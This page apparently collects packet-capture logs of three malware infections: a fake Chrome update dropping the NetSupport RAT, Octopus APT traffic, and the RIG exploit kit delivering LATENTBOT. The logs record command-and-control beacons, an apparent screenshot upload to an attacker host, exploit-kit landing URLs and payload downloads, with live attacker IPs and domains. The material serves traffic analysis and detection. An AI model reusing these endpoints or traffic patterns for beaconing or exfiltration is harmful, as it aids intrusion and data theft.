Text Example

Google Chrome FAKE Download Update Malware SocGholish campaign loads NetSupport RAT PCAP File Download Traffic Sample

2019-08-26 15:03:01.209093 IP 10.8.26.101.51807 > 10.8.26.1.53: 44756+ A? mysocalledchaos.com. (37)

2019-08-26 15:03:01.353045 IP 10.8.26.101.49163 > 166.62.111.64.80: Flags [P.], seq 1:409, ack 1, win 256, length 408: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Host: mysocalledchaos.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: en

2019-08-26 15:03:39.075406 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 17917:19120, ack 14190, win 451, length 1203: HTTP
2019-08-26 15:03:39.075745 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 19120, win 256, length 0
2019-08-26 15:03:39.168023 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 19120:20580, ack 14190, win 451, length 1460: HTTP
2019-08-26 15:03:39.168037 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 20580:22040, ack 14190, win 451, length 1460: HTTP
2019-08-26 15:03:39.168042 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [P.], seq 22040:23224, ack 14190, win 451, length 1184: HTTP
2019-08-26 15:03:39.168046 IP 130.0.233.178.80 > 10.8.26.101.49214: Flags [.], seq 23224:24684, ack 14190, win 451, length 1460: HTTP

2019-08-26 15:04:18.005975 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8959766, win 3626, length 0
2019-08-26 15:04:18.016420 IP 93.95.100.178.80 > 10.8.26.101.49204: Flags [F.], seq 13215, ack 336, win 473, length 0
2019-08-26 15:04:18.016640 IP 10.8.26.101.49204 > 93.95.100.178.80: Flags [.], ack 13216, win 256, length 0
2019-08-26 15:04:18.037966 IP 93.95.100.178.80 > 10.8.26.101.49205: Flags [F.], seq 6011, ack 365, win 473, length 0
2019-08-26 15:04:18.038169 IP 10.8.26.101.49205 > 93.95.100.178.80: Flags [.], ack 6012, win 256, length 0
2019-08-26 15:04:18.051835 IP 93.95.100.178.80 > 10.8.26.101.49206: Flags [F.], seq 343, ack 408, win 473, length 0
2019-08-26 15:04:18.052044 IP 10.8.26.101.49206 > 93.95.100.178.80: Flags [.], ack 344, win 255, length 0
2019-08-26 15:04:18.568546 IP 93.95.100.178.80 > 10.8.26.101.49207: Flags [F.], seq 16499, ack 424, win 473, length 0
2019-08-26 15:04:18.568555 IP 93.95.100.178.80 > 10.8.26.101.49209: Flags [F.], seq 16623, ack 424, win 473, length 0
2019-08-26 15:04:18.568559 IP 93.95.100.178.80 > 10.8.26.101.49208: Flags [F.], seq 15919, ack 424, win 473, length 0
2019-08-26 15:04:18.568563 IP 93.95.100.178.80 > 10.8.26.101.49210: Flags [F.], seq 16511, ack 424, win 473, length 0
2019-08-26 15:04:18.568814 IP 10.8.26.101.49207 > 93.95.100.178.80: Flags [.], ack 16500, win 256, length 0
2019-08-26 15:04:18.568842 IP 10.8.26.101.49209 > 93.95.100.178.80: Flags [.], ack 16624, win 256, length 0
2019-08-26 15:04:18.568850 IP 10.8.26.101.49208 > 93.95.100.178.80: Flags [.], ack 15920, win 256, length 0
2019-08-26 15:04:18.568856 IP 10.8.26.101.49210 > 93.95.100.178.80: Flags [.], ack 16512, win 256, length 0
2019-08-26 15:04:19.288443 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [P.], seq 3947:3986, ack 89439, win 821, length 39
2019-08-26 15:04:19.288452 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
2019-08-26 15:04:19.288696 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [.], ack 3987, win 253, length 0
2019-08-26 15:04:19.288940 IP 10.8.26.101.49200 > 31.13.93.35.443: Flags [F.], seq 89439, ack 3987, win 253, length 0
2019-08-26 15:04:19.289444 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [F.], seq 3986, ack 89439, win 821, length 0
2019-08-26 15:04:19.302333 IP 31.13.93.35.443 > 10.8.26.101.49200: Flags [.], ack 89440, win 821, length 0
2019-08-26 15:04:19.967401 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [P.], seq 1:119, ack 1, win 258, length 118: HTTP: GET /location/loca.asp HTTP/1.1
GET /location/loca.asp HTTP/1.1
Host: geo.netsupportsoftware.com
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:04:20.126241 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [P.], seq 215:521, ack 655, win 254, length 306
HTTP/1.1 200 OK
Server: NetSupport Gateway/1.6 (Windows NT)
Content-Type: application/x-www-form-urlencoded
Content-Length: 152
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=u.2h.r.. .…W.h.E..=I….=n~…….7s.4…}.X…),.,.Dq.,…..()4.]..%y-A9H=n .:!…b<D…c…)=@UX.u….8+.t_A…R..b..’h[.T…jI

2019-08-26 15:04:20.134779 IP 62.172.138.35.80 > 10.8.26.101.49216: Flags [P.], seq 1:276, ack 119, win 258, length 275: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
Set-Cookie: ASPSESSIONIDSQTTAQAS=JMCCAGKBFCGMCLKBAJJGPDLL; path=/
X-Powered-By: ASP.NET
Date: Mon, 26 Aug 2019 19:04:18 GMT
Content-Length: 1

,
2019-08-26 15:04:20.135084 IP 10.8.26.101.49216 > 62.172.138.35.80: Flags [.], ack 276, win 257, length 0
2019-08-26 15:04:20.327276 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 655:927, ack 521, win 258, length 272
POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Host: 179.43.146.90
Connection: Keep-Alive

CMD=ENCD
ES=1
DATA=l3.<(T{.E…..V….k.9|||$(m..$Cj_……..0Mt..s…M.6..

2019-08-26 15:04:20.570080 IP 179.43.146.90.443 > 10.8.26.101.49215: Flags [.], ack 927, win 253, length 0
2019-08-26 15:04:20.627030 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
FHFAEBEECACACACACACACACACACACAAA
2019-08-26 15:04:20.675976 IP 10.8.26.101.137 > 10.8.26.255.137: NBT UDP PACKET(137): QUERY; REQUEST; BROADCAST
FHFAEBEECACACACACACACACACACACAAA
2019-08-26 15:04:20.727322 IP 10.8.26.101.49215 > 179.43.146.90.443: Flags [P.], seq 927:1217, ack 521, win 258, length 290
POST http://179.43.146.90/fakeurl.htm HTTP/1.1
User-Agent: NetSupport Manager/1.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 94
Host: 179.43.146.90

2019-08-26 15:04:26.662060 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [.], ack 8960053, win 3624, length 0
2019-08-26 15:04:30.427725 IP 10.8.26.101.49214 > 130.0.233.178.80: Flags [P.], seq 409336:409766, ack 8960053, win 3624, length 430: HTTP: POST /1x1.gif?ss&ss2img HTTP/1.1
POST /1x1.gif?ss&ss2img HTTP/1.1
Accept: */*
Accept-Language: en-us
Age: a17316821ea1038c
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 979879f9.user3.altcoinfan.com
Content-Length: 385714
Connection: Keep-Alive
Cache-Control: no-cache

2019-08-26 15:03:01.423467 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 468
2019-08-26 15:03:01.423995 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 1010
2019-08-26 15:03:01.472993 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
2019-08-26 15:03:01.473493 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
2019-08-26 15:03:01.504670 IP 10.8.26.101.51808 > 172.217.1.141.443: UDP, length 28
2019-08-26 15:03:01.528689 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 254
2019-08-26 15:03:01.573710 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
2019-08-26 15:03:01.576544 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 337
2019-08-26 15:03:01.625002 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
2019-08-26 15:03:01.802524 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 247
2019-08-26 15:03:01.849036 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 28
2019-08-26 15:03:03.418784 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.421675 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.421733 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.421795 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.422363 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.422395 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.424121 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.424206 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.424444 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.435279 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.435326 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.435397 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.435469 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.435540 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.448683 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 41
2019-08-26 15:03:03.448737 IP 10.8.26.101.53650 > 172.217.9.131.443: UDP, length 28
2019-08-26 15:03:03.541893 IP 10.8.26.101.53303 > 172.217.9.170.443: UDP, length 296
2019-08-26 15:03:03.575606 IP 10.8.26.101.64439 > 172.217.9.142.443: UDP, length 1350
CHLO … PAD … SNI … VER … CCS … UAID … TCID … PDMD … SMHL … ICSL … NONP … MIDS … SCLS … CSCT … COPT … IRTT … CFCW … SFCW … www.google-analytics.com … Q046 … Chrome/76.0.3809.132 Windows NT 6.1; Win64; x64 … X509 … NSTP …

OCTOPUS APT/2 Malware PCAP Download Traffic Analysis 88.198.204.196

2018-11-06 03:08:56.939686 IP 10.1.10.73.65480 > 10.1.10.100.55555: Flags [P.], seq 1:562, ack 1, win 2053, length 561
GET /apt/DustSquad/OctopusDelphi.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://10.1.10.100:55555/apt/DustSquad/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 10.1.10.100:55555
Connection: Keep-Alive

2018-11-06 03:08:56.939868 IP 10.1.10.100.55555 > 10.1.10.73.65480: Flags [.], ack 562, win 237, length 0

2018-11-06 03:09:11.604468 IP 148.251.185.168.80 > 10.1.10.73.65490: Flags [S.], seq 949224391, ack 3926170411, win 65535, options [mss 1460,nop,wscale 6,sackOK,eol], length 0
2018-11-06 03:09:11.604766 IP 10.1.10.73.65490 > 148.251.185.168.80: Flags [.], ack 1, win 256, length 0
2018-11-06 03:09:11.608831 IP 10.1.10.73.65490 > 148.251.185.168.80: Flags [P.], seq 1:240, ack 1, win 256, length 239: HTTP: GET /d4.php?check HTTP/1.1
GET /d4.php?check HTTP/1.1
Host: 148.251.185.168
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

2018-11-06 03:09:11.735371 IP 148.251.185.168.80 > 10.1.10.73.65490: Flags [P.], seq 1:325, ack 240, win 1026, length 324: HTTP: HTTP/1.1 404 Not Found
HTTP/1.1 404 Not Found

2018-11-06 03:09:11.866394 IP 148.251.185.168.80 > 10.1.10.73.65490: Flags [F.], seq 325, ack 241, win 1026, length 0
2018-11-06 03:09:11.866628 IP 10.1.10.73.65490 > 148.251.185.168.80: Flags [.], ack 326, win 255, length 0
2018-11-06 03:09:11.869397 IP 10.1.10.73.65491 > 88.198.204.196.80: Flags [P.], seq 1:239, ack 1, win 256, length 238: HTTP: GET /d4.php?check HTTP/1.1
GET /d4.php?check HTTP/1.1
Host: 88.198.204.196
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

2018-11-06 03:09:11.995486 IP 88.198.204.196.80 > 10.1.10.73.65491: Flags [.], ack 239, win 123, length 0
2018-11-06 03:09:13.175672 IP 88.198.204.196.80 > 10.1.10.73.65493: Flags [S.], seq 1943939956, ack 4008735111, win 14600, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2018-11-06 03:09:13.175994 IP 10.1.10.73.65493 > 88.198.204.196.80: Flags [.], ack 1, win 256, length 0
2018-11-06 03:09:13.193802 IP 10.1.10.73.65493 > 88.198.204.196.80: Flags [P.], seq 1:241, ack 1, win 256, length 240: HTTP: GET /d4.php?check HTTP/1.1
GET /d4.php?check HTTP/1.1
Host: www.runa-ldn.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0

2018-11-06 03:09:13.314178 IP 88.198.204.196.80 > 10.1.10.73.65493: Flags [.], ack 241, win 123, length 0
2018-11-06 03:09:44.234391 IP 104.118.190.54.80 > 10.1.10.73.65508: Flags [S.], seq 565809931, ack 3247929270, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2018-11-06 03:09:44.234657 IP 10.1.10.73.65508 > 104.118.190.54.80: Flags [.], ack 1, win 256, length 0
2018-11-06 03:09:54.671156 IP 10.1.10.73.65508 > 104.118.190.54.80: Flags [P.], seq 1:230, ack 1, win 256, length 229: HTTP: POST /vpninfo/servers HTTP/1.1
POST /vpninfo/servers HTTP/1.1
Host: www.privateinternetaccess.com
Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept: */*
User-Agent: Ruby
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

2018-11-06 03:09:54.672196 IP 10.1.10.73.65508 > 104.118.190.54.80: Flags [P.], seq 230:279, ack 1, win 256, length 49: HTTP

2018-11-06 03:10:22.717526 IP 10.1.10.73.65527 > 10.1.10.100.55555: Flags [P.], seq 1:580, ack 1, win 2053, length 579
GET /apt/DustSquad/OctopusTelegramMessengerDropper.bin HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://10.1.10.100:55555/apt/DustSquad/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.2)
Accept-Encoding: gzip, deflate
Host: 10.1.10.100:55555
Connection: Keep-Alive

2018-11-06 03:10:22.717734 IP 10.1.10.100.55555 > 10.1.10.73.65527: Flags [.], ack 580, win 238, length 0

2018-11-06 03:11:34.409113 IP 10.1.10.73.49182 > 37.244.26.41.1119: Flags [.], ack 1, win 256, length 0
2018-11-06 03:11:34.409705 IP 10.1.10.73.49182 > 37.244.26.41.1119: Flags [P.], seq 1:140, ack 1, win 256, length 139
GET /catalogs/cdns?nocache=15414882944368240 HTTP/1.1
Host: us.patch.battle.net:1119
User-Agent: Battle.net/1.12.5.10671
Accept: */*

2018-11-06 03:11:34.413491 IP 37.244.26.41.1119 > 10.1.10.73.49183: Flags [S.], seq 1499628406, ack 606991932, win 28960, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
2018-11-06 03:11:34.413719 IP 10.1.10.73.49183 > 37.244.26.41.1119: Flags [.], ack 1, win 256, length 0
… 37.244.26.41.1119: Flags [P.], seq 1:144, ack 1, win 256, length 143
GET /catalogs/versions?nocache=15414882944368240 HTTP/1.1
Host: us.patch.battle.net:1119
User-Agent: Battle.net/1.12.5.10671
Accept: */*

2018-11-06 03:11:34.503109 IP 37.244.26.41.1119 > 10.1.10.73.49183: Flags [P.], seq 123:676, ack 144, win 4380, length 553
Region!STRING:0|BuildConfig!HEX:16|CDNConfig!HEX:16|KeyRing!HEX:16|BuildId!DEC:4|VersionsName!String:0|ProductConfig!HEX:16

## seqn = 57858

2018-11-06 03:12:14.326073 IP 23.50.51.200.80 > 10.1.10.73.49204: Flags [S.], seq 1417380829, ack 1364937650, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2018-11-06 03:12:14.326386 IP 10.1.10.73.49204 > 23.50.51.200.80: Flags [.], ack 1, win 256, length 0
2018-11-06 03:12:14.332421 IP 10.1.10.73.49204 > 23.50.51.200.80: Flags [P.], seq 1:83, ack 1, win 256, length 82: HTTP: GET /ncc.txt HTTP/1.1
GET /ncc.txt HTTP/1.1
Host: ncc.avast.com
User-Agent: Avast NCC
Accept: */*

2018-11-06 03:12:14.350954 IP 23.50.51.200.80 > 10.1.10.73.49204: Flags [.], ack 83, win 229, length 0

2018-11-06 03:12:14.351729 IP 23.50.51.200.80 > 10.1.10.73.49204: Flags [P.], seq 1:152, ack 83, win 229, length 151: HTTP: HTTP/1.1 200 OK

2018-11-06 03:13:14.499210 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [P.], seq 4535:4877, ack 302, win 3, length 342: HTTP

2018-11-06 03:13:14.516560 IP 10.1.10.73.62218 > 77.234.42.247.80: Flags [P.], seq 302:604, ack 4877, win 255, length 302: HTTP: GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCCuoZnKgcIAxDe25dmMgoIBBCCuoZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCCuoZnKgcIAxDe25dmMgoIBBCCuoZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
Host: su.ff.avast.com
Accept: */*
Content-Type: application/octet-stream
Pragma: no-cache
Connection: keep-alive

2018-11-06 03:13:14.589588 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [.], ack 604, win 4, length 0

2018-11-06 03:17:59.378603 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [P.], seq 9411:9771, ack 604, win 4, length 360: HTTP

2018-11-06 03:17:59.396393 IP 10.1.10.73.62218 > 77.234.42.247.80: Flags [P.], seq 604:906, ack 9771, win 255, length 302: HTTP: GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCjvIZnKgcIAxDe25dmMgoIBBCjvIZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
GET /R/A3gKIGQ1Yjc2MDk4NjNhNjQ1N2JhNmZhMjZlYjFjNzgxNGE5EgQGBREYGJcFIgH-KgcIBBCjvIZnKgcIAxDe25dmMgoIBBCjvIZnGIAKOLKSnJABQiCzHp13tjgkeEmf_uYnjqPisL61OLbIXDB0_dRDuRVZGkiAgyg= HTTP/1.1
Host: su.ff.avast.com
Accept: */*
Content-Type: application/octet-stream
Pragma: no-cache
Connection: keep-alive

2018-11-06 03:17:59.471625 IP 77.234.42.247.80 > 10.1.10.73.62218: Flags [.], ack 906, win 4, length 0

2018-11-06 03:20:48.497232 IP 104.110.209.95.80 > 10.1.10.73.49426: Flags [S.], seq 1611496151, ack 3370241501, win 29200, options [mss 1460,nop,nop,sackOK,nop,wscale 7], length 0
2018-11-06 03:20:48.497541 IP 10.1.10.73.49426 > 104.110.209.95.80: Flags [.], ack 1, win 256, length 0
2018-11-06 03:20:48.498451 IP 10.1.10.73.49426 > 104.110.209.95.80: Flags [P.], seq 1:230, ack 1, win 256, length 229: HTTP: POST /vpninfo/servers HTTP/1.1
POST /vpninfo/servers HTTP/1.1
Host: www.privateinternetaccess.com
Accept-Encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
Accept: */*
User-Agent: Ruby
Content-Length: 49
Content-Type: application/x-www-form-urlencoded

2018-11-06 03:20:48.498498 IP 10.1.10.73.49426 > 104.110.209.95.80: Flags [P.], seq 230:279, ack 1, win 256, length 49: HTTP

RIG Exploit Kit EK Delivers LATENTBOT Malware APT 148.251.255.108 Trojan RAT PCAP file download traffic sample

2016-10-26 16:40:22.706650 IP 192.168.10.20.49625 > 54.200.153.243.80: Flags [P.], seq 1:257, ack 1, win 16475, length 256: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: gadistrictkiwanis.org
Connection: Keep-Alive

2016-10-26 16:40:22.869283 IP 54.200.153.243.80 > 192.168.10.20.49625: Flags [.], ack 257, win 123, length 0
2016-10-26 16:40:30.096078 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1:461, ack 1, win 16475, length 460: HTTP: GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
GET /?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://gadistrictkiwanis.org/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:30.130644 IP 185.82.200.52.80 > 192.168.10.20.49681: Flags [S.], seq 2607864839, ack 1742428895, win 14600, options [mss 1318,nop,wscale 3,nop,nop,sackOK], length 0

2016-10-26 16:40:30.543064 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 461:1110, ack 2342, win 16219, length 649: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBxFlvbJN0sohfQDmK1JDEqi_WySTl-1g HTTP/1.1
Accept: */*
Referer: http://pevn5.l6jmgq.top/?wn-BcbCUKxnGDYA=l3SKfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFd
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.656330 IP 192.168.10.20.49682 > 185.82.200.52.80: Flags [P.], seq 1110:1543, ack 55086, win 16469, length 433: HTTP: GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
GET /index.php?wn-BcbCUKxnGDYA=l3SMfPrfJxzFGMSUb-nJDa9GP0XCRQLPh4SGhKrXCJ-ofSih17OIFxzsqAycFUKCqrF4Qu4Fah2h1QWScEZrmYRPFgVIove8hQLfyhSWkpSG-BPeZ19C_JaSQbBt3w7xm7dHdJ0nxheF4DRXxewYQFFT6wkZjuyeV7PC7kpzXlBvEQ7bJN0sohfQDmK1JDEqi_O7QDNykKM&dfgsdf=204 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: pevn5.l6jmgq.top
Connection: Keep-Alive

2016-10-26 16:40:31.774878 IP 185.82.200.52.80 > 192.168.10.20.49682: Flags [.], ack 1543, win 2487, length 0
2016-10-26 16:40:35.962673 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 1:193, ack 1, win 16475, length 192: HTTP: GET / HTTP/1.1
GET / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:36.317766 IP 148.251.255.108.80 > 192.168.10.20.49701: Flags [P.], seq 1:39, ack 193, win 64048, length 38: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
CONTENT-LENGTH: 0

2016-10-26 16:40:36.323107 IP 192.168.10.20.49701 > 148.251.255.108.80: Flags [P.], seq 193:717, ack 39, win 16465, length 524: HTTP: GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
GET /QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB HTTP/1.1
Accept: text/*, QWRsN2srdjlxUUdDYVp0aTBMUzl2cStzYzF0ek1hZ2VLSWJvRGlpb0dFdTBUOHZ1M21LSTJGVFBRenlxbWNSV2FDbDV1S1Axa2FlUFE3dGZGWEVPVGdhTGZwOURhWmh3dFdHSG5laWxOdGRB, 148.251.255.108, _^[….
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Host: 148.251.255.108
Cache-Control: no-cache

2016-10-26 16:40:37.005980 IP 148.251.255.108.80 > 192.168.10.20.49702: Flags [P.], seq 1:75, ack 228, win 64013, length 74: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
CONTENT-TYPE: application/zip

2016-10-26 16:40:37.200030 IP 192.168.10.20.49704 > 148.251.255.108.80: Flags [P.], seq 1:252, ack 1, win 16475, length 251: HTTP: GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
GET /i30pRl1/17311674278927773327459.zip HTTP/1.1
Content-Type: application/x-www-form-urlencoded
